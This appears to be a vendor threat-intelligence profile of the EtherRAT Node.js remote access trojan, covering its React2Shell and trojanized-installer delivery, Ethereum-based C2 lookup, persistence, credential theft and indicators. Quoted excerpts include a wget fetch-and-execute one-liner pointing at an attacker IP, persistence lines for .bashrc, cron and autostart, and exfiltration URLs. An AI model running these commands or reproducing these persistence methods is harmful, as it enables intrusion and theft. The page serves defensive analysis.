EtherRAT
EtherRAT is a JavaScript/Node.js remote access trojan and persistent access implant that was first publicly reported in December 2025 in React2Shell (CVE-2025-55182) exploitation against vulnerable Linux/Next.js servers, and later evolved into a Windows-focused threat delivered through trojanized MSI installers and spoofed GitHub repositories impersonating legitimate IT tools such as Tftpd64, PsExec, AzCopy, Sysmon, LAPS, Kusto Explorer, and RAMMap. On Linux, observed delivery involved a shell script fetched from 193.24.123[.]68:3001/gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh that downloaded a legitimate Node.js runtime, decrypted AES-256-CBC-protected JavaScript components, and launched the implant. On Windows, malicious installers created staging directories under local app data, deployed or downloaded Node.js, and established persistence via HKCU\Software\Microsoft\Windows\CurrentVersion\Run, often launching conhost.exe in headless mode to invoke node.exe with obfuscated payloads.
A defining feature of EtherRAT is blockchain-based command-and-control discovery: multiple reports state that it retrieves live C2 information from Ethereum, including smart contract 0x22f96d61cf118efabc7c5bf3384734fad2f6ead4 in Linux-focused activity, and that Windows variants query public Ethereum RPC infrastructure, including 1rpc.io and other public RPC services, to resolve or refresh C2 URLs. Reported resolved infrastructure included hxxp://91.215.85[.]42:3000, with historical references to 173.249.8.102 and an older fallback C2 of hxxp://135[.]125[.]255[.]55. The malware polls C2 frequently using randomized paths designed to resemble static asset requests and uses the X-Bot-Server header in at least the Linux variant. Some reporting also describes self-update or re-obfuscation behavior in which the malware can overwrite its own source with server-provided JavaScript.
Observed Linux persistence mechanisms include systemd user services, XDG autostart entries, cron jobs, and .bashrc and .profile modification. Windows variants persist through Run key entries and silent background execution through conhost.exe and node.exe. Reconnaissance capabilities directly described in the reporting include collection of host identity and environment data, system locale, GPU details, antivirus products, Active Directory domain membership, logged-in session status, MachineGuid values, and broader host/network profiling.
EtherRAT has been observed delivering or executing follow-on JavaScript modules for credential and cryptocurrency theft, host reconnaissance, React2Shell scanning and exploitation, web-server hijacking, and SSH persistence. Reported theft targets include cryptocurrency wallets, BIP39 seed phrases, Ethereum private keys, SSH keys, cloud credentials, tokens, database secrets, browser-stored data, shell histories, API keys, and Kubernetes- or cloud-related secrets. Exfiltration associated with the Linux campaign included hxxp://91.215.85[.]42:3000/crypto/keys. Additional observed behavior includes scanning public and private IPv4 ranges on ports 80, 443, 3000, 3001, 8080, and 8443 for vulnerable React/Next.js servers; exploiting React2Shell to propagate; modifying nginx and Apache configurations to redirect traffic to hxxps://xss[.]pro; and appending an attacker SSH public key to authorized_keys.
Targeting described in the content includes Linux servers exposed to React2Shell exploitation, as well as enterprise administrators, DevOps engineers, security analysts, IT administrators, and network professionals lured into downloading spoofed administrative tools. Industries explicitly mentioned in related exploitation reporting include insurance, e-commerce, IT, and cryptocurrency organizations. Several sources note suspected DPRK/North Korea links, including Sysdig’s reporting of possible North Korean-linked deployment and later reporting that the campaign was suspected to be linked to a DPRK APT, but attribution is not presented as definitive across the content. Other reporting notes code or infrastructure overlaps discussed in relation to Lazarus-linked tooling and, separately, similarities noted by eSentire to Tsundere malware investigated in MuddyWater-attributed infrastructure.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
The threat actors leveraged the CVE‑2025‑55182 (React2Shell) vulnerability... React2Shell is a vulnerability in the Flight protocol, which facilitates client-server communication for React Server Components. The vulnerability stems from insecure deserialization... Under certain conditions, this can enable an attacker to execute arbitrary code on the server. | Additionally, React2Shell attacks were recorded to distribute new EtherRAT malware, which was previously analyzed by Sysdig Threat Research Team.
Groups observed using it
3 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Ultimately, Atos Researchers identified it to be an EtherRat malware, a recently emerging threat using Ethereum to store C2 URL addresses, preventing takedown of the infrastructure.
this payload, dubbed EtherRAT, represents something far more sophisticated. It is a persistent access implant that combines techniques from at least three documented campaigns into a single, previously unreported attack chain.
“this payload, dubbed EtherRAT… is a persistent access implant… EtherRAT leverages Ethereum smart contracts for command-and-control (C2) resolution…”
Techniques & procedures
33 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniquesWhile exploiting the React2Shell vulnerability, threat actors downloaded Tactical RMM... Script 3 ... After identifying a host vulnerable to React2Shell, it exploits the vulnerability to download and execute a payload script
The compromised distribution investigated by our team originated from a malicious GitHub repository impersonating the official project and offering downloads for “Tftpd64 v4.74.” Users who retrieved the ZIP or MSI file unknowingly received a bundle containing the EtherRAT implant embedded alongside legitimate‑looking components.
Execution
5 techniquesThe script also establishes persistence by creating... a Cron task... If executed without root privileges... adds it to both crontab (via @reboot) and .bashrc... EtherRAT establishes persistence through... crontab.
This included PowerShell‑driven queries for system locale, GPU details, antivirus products registered under the Windows Security Center, Active Directory domain membership, logged‑in user session status, and MachineGuid values.
After compromising a host via the React2Shell vulnerability, threat actors executed the following commands inside a container: /bin/sh -c 'cd /tmp; wget hxxp://176.117.107[.]154/bot; chmod 777 bot; ./bot...'
This script serves as the EtherRAT malware capable of executing arbitrary JS code received from the C2 server... Subsequently, the malware sends a query to this C2 server to retrieve JS code fragments.
The threat actors leveraged the CVE‑2025‑55182 (React2Shell) vulnerability... Under certain conditions, this can enable an attacker to execute arbitrary code on the server.
Persistence
7 techniquesThe malware establishes persistence through... .bashrc : (nohup /usr/bin/node <jsPath> >/dev/null 2>&1 &) ... .profile : (/usr/bin/node <jsPath> >/dev/null 2>&1 &)
The script also establishes persistence by creating... a Cron task... If executed without root privileges... adds it to both crontab (via @reboot) and .bashrc... EtherRAT establishes persistence through... crontab.
The script also establishes persistence by creating a systemd service /etc/systemd/system/apaches-main.service... If executed with root privileges... creates a systemd service... CrossC2 check.sh creates and starts a service... EtherRAT establishes persistence through: systemd.
If executed without root privileges... adds it to both crontab (via @reboot) and .bashrc... EtherRAT establishes persistence through... .bashrc ... .profile
The malware establishes persistence through... XDG Autostart: [Desktop Entry] Type=Application Name=System Service Exec=/usr/bin/node /<jsPath>
Organizations have been urged to... observe suspicious entries in Windows Run registry keys to combat the threat.
Privilege Escalation
6 techniquesThe malware establishes persistence through... .bashrc : (nohup /usr/bin/node <jsPath> >/dev/null 2>&1 &) ... .profile : (/usr/bin/node <jsPath> >/dev/null 2>&1 &)
The script also establishes persistence by creating... a Cron task... If executed without root privileges... adds it to both crontab (via @reboot) and .bashrc... EtherRAT establishes persistence through... crontab.
The script also establishes persistence by creating a systemd service /etc/systemd/system/apaches-main.service... If executed with root privileges... creates a systemd service... CrossC2 check.sh creates and starts a service... EtherRAT establishes persistence through: systemd.
If executed without root privileges... adds it to both crontab (via @reboot) and .bashrc... EtherRAT establishes persistence through... .bashrc ... .profile
The malware establishes persistence through... XDG Autostart: [Desktop Entry] Type=Application Name=System Service Exec=/usr/bin/node /<jsPath>
Stealth
4 techniquesThe archive included several anomalous auxiliary files... attackers hide the core JavaScript payload inside encrypted or obfuscated .dat files... During execution, EtherRAT contacted domains such as wpuadmin[.]shop... and handled encrypted configuration elements stored using AES‑256‑CBC with bundled keys and IVs.
Threat actors have leveraged a malicious copy of the popular Windows TFTP server and admin tool, Tftpd64... Executing the illicit Tftpd64 installer file downloaded from a spoofed GitHub repository...
The loader decrypts this payload using a XOR operation with the key 0x99 ... kxnzl4mtez.js decrypted the 1d5j6rm2mg2d file using AES-256-CBC ... configuration data is decrypted using the AES-128-CBC algorithm
...enables EtherRAT to establish a concealed directory within the local app data folder while deploying a self-contained Node.js runtime and other staged components to evade security tools...
Defense Impairment
1 techniqueCredential Access
3 techniquesThis is a script that functions as a JS-based stealer designed to collect and exfiltrate a wide array of sensitive user data, including cryptocurrency wallets, access tokens, cloud service configurations, and database credentials.
This script automatically modifies the configuration of nginx and Apache web servers in order to force all HTTP and HTTPS traffic to redirect to an external domain.
The script harvests private SSH keys, performs a complete scan of the ~/.ssh directory...
Discovery
9 techniquesThe script gathers a set of basic system information, including the username and hostname... Reconnaissance ... id
Script 3... generates random public IPv4 addresses and tries them against ports 80, 443, 3000, 3001, 8080, 8443. After identifying a host vulnerable to React2Shell, it exploits the vulnerability...
The alive.sh script executes ps -eo pid,pcpu --no-headers... The script also records... a list of running web server processes.
After compromising a host via the React2Shell vulnerability, the attackers performed reconnaissance... Decoded commands: ls ... nslookup `whoami`... nslookup `id`... The ch.sh script executed a series of reconnaissance commands to gather... date hostname uname -a id...
Decoded commands: ls ... nslookup `ls`... The JS-based stealer recursively traverses directories with a depth limit... scans home and system directories...
...obtaining Active Directory domain membership...
it also extracts tokens and API keys from various services, including ... cloud providers (AWS, GCP, Azure) ... extracts AWS configuration files, gcloud-credentials
extracts AWS configuration files, gcloud-credentials, and Kubernetes and Docker configuration files
...obtaining Active Directory domain membership, system locale, and other details...
Collection
1 techniqueThis is a script that functions as a JS-based stealer designed to collect and exfiltrate a wide array of sensitive user data... scans home and system directories... reads files up to 10 MB in size
Command and Control
2 techniquesThe a_x86 / a_x64 files use the same C2 server: 154.89.152[.]240:443 ... MeshServer=wss://156.67.221[.]96:443/agent.ashx ... The malware sends a query to this C2 server ... GET /api/{rand4hex}/{botID}/...
This script downloaded the XMRig cryptocurrency miner... The attackers also loaded the d5.sh Bash script onto the compromised host to download the Sliver implant... The attackers employed the check.sh Bash script to download ELF executables (a_x86 / a_x64) from a server.
Exfiltration
1 techniqueThe script recursively traverses directories... and finally exfiltrates the harvested data to the remote server hxxp://91.215.85[.]42:3000/crypto/keys... The collected data was then exfiltrated to hxxp://109.238.92[.]111:8000/upload.
Impact
1 technique...a new hybrid attack campaign that combines system compromise with cryptocurrency theft... before downloading another Node.js runtime and targeting several Ethereum RPC endpoints and Ethereum wallet addresses.
IOCs tracked for this family
113 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
62 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A malware family with Linux and Windows variants that establishes persistence, downloads a portable Node.js runtime, launches obfuscated JavaScript payloads, and uses Ethereum blockchain infrastructure via EtherHiding/1rpc.io to dynamically resolve and update its C2 configuration.
A remote access trojan delivered via a trojanized Tftpd64 installer from a spoofed GitHub repository. It establishes persistence, creates a concealed directory under local app data, deploys self-contained Node.js runtimes and staged components to evade security tools, performs system reconnaissance including Active Directory domain membership and system locale collection, and targets Ethereum RPC endpoints and wallet addresses for cryptocurrency theft.
A multi-stage, fileless-style JavaScript RAT distributed via malicious MSI installers masquerading as legitimate administrative tools. It uses staged execution, in-memory decryption/execution of payloads, persistence via a registry Run key, and stores live C2 server address information via the Ethereum blockchain.
A multi-stage, fileless-style Node.js remote access trojan delivered via malicious MSI installers impersonating administrative tools. It uses layered AES-256-CBC encryption, downloads Node.js at runtime, establishes persistence via the Run registry key, resolves C2 through Ethereum smart contracts/public RPC endpoints, polls for commands, executes arbitrary JavaScript/OS commands, exfiltrates data, and periodically re-obfuscates itself.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.